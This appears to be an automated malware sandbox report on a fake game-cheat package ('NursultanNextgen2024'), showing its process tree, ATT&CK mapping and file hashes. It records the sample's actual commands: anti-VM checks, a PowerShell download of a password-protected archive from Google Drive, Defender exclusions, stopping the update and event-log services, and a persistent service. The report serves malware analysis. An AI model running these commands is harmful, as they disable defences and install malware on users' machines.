PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 1376	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 1376	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4108	3896	chrome.exe	chrome.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04de7b3f382c41f8bfa36ea205f3ae807457ff7f
1⤵
PID:3748

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\TestEdit.xhtml
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1388

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffc8269758,0x7fffc8269768,0x7fffc8269778
2⤵
PID:3920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:2
2⤵
PID:4452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:1376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:4108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
2⤵
PID:3456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
2⤵
PID:352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4452 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
2⤵
PID:1708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4616 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:2300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:1480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5068 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:3108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5068 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
2⤵
PID:1124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3700 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
2⤵
PID:3076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3012 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
2⤵
PID:4296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3120 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
2⤵
PID:1932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:3068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
2⤵
PID:1380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5348 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4820

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:768

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
1⤵
PID:4556

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
2⤵
PID:2564

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
2⤵
PID:1416

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
2⤵
PID:2148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
2⤵
PID:592

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
3⤵
PID:2768

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
2⤵
PID:1328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1948

C:\Windows\system32\chcp.com
chcp 65001
2⤵
PID:4204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
2⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2768

C:\Windows\system32\wscript.exe
wscript /b
2⤵
PID:3748

C:\Windows\system32\chcp.com
chcp 65001
2⤵
PID:2992

C:\Windows\system32\timeout.exe
timeout 0
2⤵
- Delays execution with timeout.exe
PID:4836

C:\Windows\system32\doskey.exe
doskey /listsize=0
2⤵
PID:2916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4876

C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
2⤵
PID:2640

C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2940

C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:4476

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:592

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:2768

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
3⤵
- Launches sc.exe
PID:380

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:352

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
3⤵
- Launches sc.exe
PID:4508

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
3⤵
- Launches sc.exe
PID:4216

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
3⤵
- Launches sc.exe
PID:1292

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:2568

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Power Settings
PID:3068

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:704

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Power Settings
PID:4036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WindowsPower"
3⤵
- Launches sc.exe
PID:4820

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WindowsPower" binpath= "C:\ProgramData\windows\powershell.exe" start= "auto"
3⤵
- Launches sc.exe
PID:2424

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:1372

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WindowsPower"
3⤵
- Launches sc.exe
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
3⤵
PID:2172

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:3036

C:\Windows\system32\timeout.exe
timeout 0
2⤵
- Delays execution with timeout.exe
PID:3680

C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
2⤵
PID:3588

C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:1284

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:3636

C:\ProgramData\windows\powershell.exe
C:\ProgramData\windows\powershell.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4676

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:4636

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:4168

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:4880

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:1372

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:4324

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:236

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:528

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Power Settings
PID:2576

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Power Settings
PID:4960

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Power Settings
PID:3024

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:2868

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:4832

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
Filesize
27KB

MD5
97f07e182259f3e5f7cf67865bb1d8f0

SHA1
78c49303cb2a9121087a45770389ca1da03cbcdf

SHA256
c3a70f23a2cf331852a818d3f2a0cf7f048753c9b47aa4e7f0fee234c46b226c

SHA512
10056ad3a71ee806a8d8aff04d513a079568bf11799016f76f27c4255be2141a4c2d99c1f46bbfde9c99ba0f8b44e780a92b59f514d3cc1c248ead915c31b5dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
288B

MD5
95b380ff0eaa6797f86b9bbb25a61396

SHA1
cad3154bccd6aa2a1ab73d3bb92dde796b052ea3

SHA256
0c9bc173c6af36f916657f2b26d8bfdcb886b340618f7d7bb7466a544b7d3953

SHA512
8a2d307ee3b17157600aabf3caf8c14d26bd671e332f0c1ed1c9dfe6623c2da4b0c3a492ecd118bcc0f4d2892224cf7c0ba6fc6d1425e715149f4c6807823474

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Filesize
20KB

MD5
f7ad01b216d7d7118fe161284c3b3408

SHA1
cdf5bbc3a915156d715d79ba4f5a7daef069afc6

SHA256
3462de445f10dbdd049b77bd7619d4b52fb1f91fbb56ebba1865b756e22b10e6

SHA512
f9ebf74fa197b8bdeed2db95d73862f54a2e71b84f32778c2abe3cf719f002354d469ca4b8d9b23c1d23d647f5a5733e2d0f8e0bf032f93dad89deec5f6e898b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
1KB

MD5
81461675afeb386168f85d2c4ff14cf1

SHA1
8e8a37836cebccf98ea170a025ad09780870eb63

SHA256
3d6c94844706cb725bc72225b8e4018236c05086ceef449270e6b58361ecc584

SHA512
9c8a7b2858058d15e8c19503f33ba65eaa0ca1540c96f561ab1c8f3b0f6ce9f48eca60d9fd5fb92a170ae69265a46e4b82a9de2ab8cd4c0b7b3d1a4cd99dd1c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
e686f6d8e2ccae5626e8e9c2504360ef

SHA1
5274132cd89ca174b4d61efd596d5e95edfdb95c

SHA256
23fcb609ef389d1eed440cd9136757553bc94024b4cc197272833fe289bc78bf

SHA512
6083ca2edeb75b9d7e5dd8255f556bba1c88191804af8f6b0d6a409bf5343cf4fc8715b99a1572195d208ddc78061b68c6209351647cfa5b77828fca0ae57cf7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
371B

MD5
0cc78e0c985d1a138db6cd1039019fba

SHA1
394a729c3dfc4a2a8ba7d508342f3681fd530169

SHA256
78a96e4c865aad34d37d8711dfdf165760ebf7e35e2f5cf454e43e1da3fef2c7

SHA512
29ba1bbdfc4618c3c3928f098ebb08a82ac67ab8558f79b96e5b18fe4b17f997967e0b4e239ff9626379994cea5f32561d1fd7991191ccf21b63936f2156dfa8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
99f17e53ffa6dccd213bbbab7bab994a

SHA1
27aa57850b80b49bfe3474046aabbdb7cf046b31

SHA256
ba09eeefbf2c17f13ea9780d601513dede0766d408cbe890f8453392644a63b2

SHA512
9611f46f7fa599b994975446b4f933f0b32ede971fae8152e37039376f886c05bfc435390a69c46a6a6f6efdfda925ac9f746a9a8b028cd2892ec0c651f68bdf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
47ee741e8141b49a3360a46f7cb427fd

SHA1
ff6416a38f8f624e2b4e634e0a2ed117178cfa03

SHA256
7f9e3c1774b9271a001c67e7efa69135b0d2641e4c214c84a7db3586d78344ba

SHA512
7eb19b5582fb01b02dd818bd60984efdb9365e57b79f20c704df02484fe41a44ce454a440ba8b9258565485978855b5962ae829e875e84335f9df8ca42264e85

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
6467057b4c3f3556ec151f4446687621

SHA1
dd8d7b051afa8ccf0e270f57e430cd2d216564f9

SHA256
9c1fb52d5f46e426503c54a86c5088390dac8323bbc369544ec6b43fcb876c0b

SHA512
bf441ef873e9e2296ff9811ac189d14afe4877e59df85fd009e42a2b59f56bf62450ea26c567c67393b89a4b7f6518fa2ff84f3a78513460a2d43e6ead1a85db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
1e23e5b18d755d8133c2332e156d81c2

SHA1
8ddf6934bcdfb8e0ce11c50b79bac75f17aa1916

SHA256
09be04245a15a0381820aa9f54142b45ac9c5d8bdc25bffeb36eed67dc2444fb

SHA512
e6299e81dc37741dc64b8ee216a355e784c3eeb540cabadc12ac492e7b7f6ab19f91ffb1a8b4ea7a80ebc16e91507bb24b981d4a821601d09b6aedbb9cfdd4d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
76ee6a6423b5a19e684bc57a7ef36068

SHA1
01c9b1d55afe6973040a0f3b47917a87e1afb9d2

SHA256
ac49b75ada996cfb55c53728dcc076bb2a4c762d24f137f2009e4a6ee47a66d8

SHA512
a2b1aad4d6791c447056614c7afea6dd64fec4996025881b5201b9159979f529614ba344a784bba20ff97afa88897726e582d1b29be0c2a4a8fa18e90fb3cb33

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
5af390c5172df390515185bf0d2c6712

SHA1
f18acde01b47480906da76c92eb2896ff062dad7

SHA256
e8211418ce96d9915c9cea6b3c4efb065aa69b5bb8231854e872196058a6b47b

SHA512
56cb1bb0840d00127c959ae9b07b4bcb68066765da4d8043b8b69f6b22738f7d9364a0990dcfddf5c3ae9a09f03672aed7a491831984f65e96365580c7143a03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
12KB

MD5
fca679ee9ee6b7bb02d9661879f4b418

SHA1
f14ca76fb3f7bb985f01ce9ebb867ecca854d6c9

SHA256
48b908a62f870be931962a754d35d9bba569b16edd1c77b0902065a9eb4cb03b

SHA512
59de552d499e94069cfc422e6ec8da4fabe7cae6f9a4fb856b17955d94efca21e45e15d37d7c3bfa6c5e2931d30fd2eff785bee6f6ed049ebd83b5f2d13dacec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
